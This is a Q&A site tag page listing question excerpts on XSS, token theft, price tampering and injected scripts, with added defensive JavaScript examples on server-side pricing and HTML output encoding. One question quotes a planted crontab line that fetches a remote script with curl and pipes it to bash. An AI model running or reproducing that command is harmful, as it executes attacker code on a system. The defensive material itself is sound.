Questions tagged [client-side-attacks]

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. (Source: Wikipedia)

56 questions
2 votes, 0 answers

Injection Script, what does it do?

Operating a web store via one of the popular platforms and had an order come through with the following script embedded in several of the fields: name, address, etc. I'm trying to understand what the script accomplishes. I've removed any way for it…
A Bomb
2 votes, 1 answer

What exactly is meant by 'External Service Interaction' reported by Burp Suite?

Upon running the Burp Security Suite on our web application, I'm getting an issue like 'External Service Interaction' in a page where there's a textbox for getting email addresses. Think of it like inviting other people to our website. The page is…
user937999
2 votes, 0 answers

Avoid remote website inclusion

I recently saw a few malicious domains including my website pages. I initially suspected iframe inclusion, but I already had Header always set X-Frame-Options SAMEORIGIN configured in my httpd.conf. Other ideas were about malware Javascript…
Fabio B.
2 votes, 1 answer

How can you stop resending a webpage when the client doesn't return an answer to the server

I want to host a web server, but there's something in my way: DDoS attacks. I'm very new to hosting a web server, and I just recently found out about them. I might be wrong, but I know that when bots send requests to the server, they do not return…
user7339340
1 vote, 1 answer

Saving access token and refresh token to local storage but encrypted?

I've been studying front-end developing using ReactJS and back-end using ASP.NET Core and as a first step I've been developing an authentication/authorization (login) system. I've implemented access token that expires in 1 hour and refresh tokens…
asallan3
1 vote, 5 answers

Does somebody know about this: repo1.criticalnumeric.tech

I found that in the company server there is a crontab that runs with this code: */3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null…
umeixueiro
1 vote, 2 answers

How to prevent hackers from modifying the product price in e-commerce

I'm sure this is a pretty universal question, but I somehow can't find any info on it online. I have an e-commerce site with different product prices. I then use Javascript to calculate the total price, but where exactly should I store each pricing…
Ben Viatte
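The standard answer to the question above is that the browser never gets to say what anything costs: the client sends product identifiers and quantities, and the server prices the cart from its own catalog. Here is an added Node.js example of that (not the questioner's code); the catalog, SKUs and prices are made up, and the tampered request at the bottom is constructed to show that extra fields sent by the client are simply ignored.

```javascript
// Added example: the server, not the browser, decides what an order costs.
// Catalog contents and prices are assumptions made up for the example.
const CATALOG = new Map([
  ['sku-1001', { name: 'T-shirt', priceCents: 1999 }],
  ['sku-1002', { name: 'Mug',     priceCents:  899 }],
]);

// The client may only name products and quantities. Any price, discount or
// total it sends is ignored, so editing those in the browser changes nothing.
function priceCart(cartItems, catalog = CATALOG) {
  if (!Array.isArray(cartItems) || cartItems.length === 0) {
    throw new Error('cart is empty or malformed');
  }
  const lines = [];
  let totalCents = 0;
  for (const item of cartItems) {
    const product = catalog.get(item && item.sku);
    if (!product) throw new Error(`unknown product: ${item && item.sku}`);
    const qty = item.qty;
    // JSON lets the client send "2", 2.5 or -1; accept only a sane integer.
    if (!Number.isInteger(qty) || qty < 1 || qty > 100) {
      throw new Error(`invalid quantity for ${item.sku}`);
    }
    const lineCents = product.priceCents * qty; // integer cents: no float rounding
    lines.push({ sku: item.sku, name: product.name, qty, unitCents: product.priceCents, lineCents });
    totalCents += lineCents;
  }
  return { lines, totalCents };
}

// Display helper for the browser side. The number it shows is a preview;
// checkout always calls priceCart() again on the server.
function formatCents(cents) {
  return `$${(cents / 100).toFixed(2)}`;
}

// Constructed tampered request: the attacker added their own price and total.
// priceCart() never reads those fields, so the order still costs 2 x $19.99.
const TAMPERED_REQUEST = [
  { sku: 'sku-1001', qty: 2, priceCents: 1, total: 0.02 },
];

function demo() {
  const priced = priceCart(TAMPERED_REQUEST);
  return `${priced.lines.length} line(s), total ${formatCents(priced.totalCents)}`;
}
```

The same principle covers the later question about hiding role logic from the developer tools: menu items can be hidden in the Angular front end for convenience, but every privileged API route must check the role server-side, because anything the browser receives can be read and altered.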
1 vote, 2 answers

Handle stolen JWT?

I'm building a nodejs server with jwt authentication. At the moment my jwts have an expiration time of 1 month. If the user goes on the login page, I check if his request contains a valid jwt; if yes, he doesn't have to type in his username and…
mcAngular2
1 vote, 2 answers

Javascript injected in all drupal websites of a server

For the last few days, my sites have come under malicious attack. When I open a site http://site1.com it first gets redirected to another page (possibly an ad page). In the Chrome browser when I try to diagnose the problem through the console (F12), I…
Sohel Pathan
1 vote, 1 answer

Sanitise text input for display on HTML page

Have built a chat program for our website. A part of the program does allow a web page comment area for chatting about the page. So there is a text input so text is entered and redisplayed on the page. Obviously that is potentially risky. So in…
wingyip
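For the case in the question above, where user text is only ever redisplayed as text, the defence is output encoding for the exact HTML context the text lands in, not input filtering. Here is an added JavaScript example (not the questioner's chat code): an entity encoder that is safe in element text and quoted attributes, a separate `href` check because entity-encoding does not neutralise `javascript:` URLs, a server-side renderer that uses both, and the browser-side equivalent that builds DOM nodes with `textContent` instead of `innerHTML`. The sample messages are constructed.

```javascript
// Added example: context-aware output encoding for a chat/comment widget.
// The sample messages used with it are constructed for the example.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Safe inside element text and inside double- or single-quoted attribute
// values. Not safe inside <script>, inline event handlers or unquoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// href/src are a different context: a fully entity-encoded "javascript:alert(1)"
// still runs when clicked, so parse the URL and allow only http(s).
function safeHref(raw) {
  try {
    const u = new URL(String(raw));
    if (u.protocol === 'http:' || u.protocol === 'https:') return escapeHtml(u.href);
  } catch (_) {
    // relative or unparsable: fall through to the inert value
  }
  return '#';
}

// Server-side (or template) rendering of one chat line as an HTML string.
// Every interpolation goes through the encoder for its context.
function renderComment({ author, text, link }) {
  const linkHtml = link
    ? ` <a href="${safeHref(link)}" rel="noopener noreferrer">link</a>`
    : '';
  return `<li class="comment" title="${escapeHtml(author)}">` +
    `<b>${escapeHtml(author)}</b>: ${escapeHtml(text)}${linkHtml}</li>`;
}

// Browser-side alternative when the page builds the DOM itself: assign
// textContent and let the browser do the encoding; never use innerHTML here.
function appendCommentToDom(listEl, { author, text }, doc = globalThis.document) {
  const li = doc.createElement('li');
  const b = doc.createElement('b');
  b.textContent = author;
  li.appendChild(b);
  li.appendChild(doc.createTextNode(`: ${text}`));
  listEl.appendChild(li);
  return li;
}
```

This covers the plain-text case only. Keeping a subset of tags, as the Jsoup question further down asks, needs a real HTML parser with an allowlist of tags and attributes (what Jsoup's cleaner does); regex-based stripping is not a substitute.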
1 vote, 0 answers

Security Attacks possible on TokenBased Authentication?

I have designed a web application which uses a very simple implementation of JWT tokens to provide Authentication/Authorization. My Implementation: There are two types of URLs, public and secure. Public URLs are to generate a token with…
Mohd Waseem
1 vote, 1 answer

how to prevent the clients from debugging the code in javascript using developer tool

We have the angularjs application where we have different roles associated with the users. For ex: the two roles are Admin and Local. Based on the role, we show some menu items for the Admin and add more features/screens to the Admin. The userInfo…
1 vote, 1 answer

How Jsoup could clean XSS javascripts and maintain some HTML tags?

I want to clean some HTML strings in my Java application from XSS attacks using Jsoup. But I also want to keep the and tags. Is this possible with this library?
harryssuperman
1 vote, 0 answers

Making a Chrome plug-in of Suricata/Snort for intrusion detection on client side

I want to use Suricata turning it into a Chrome browser plugin for internet based intrusion detection. Specifically, I want to detect/prevent malicious attack of access to cache data.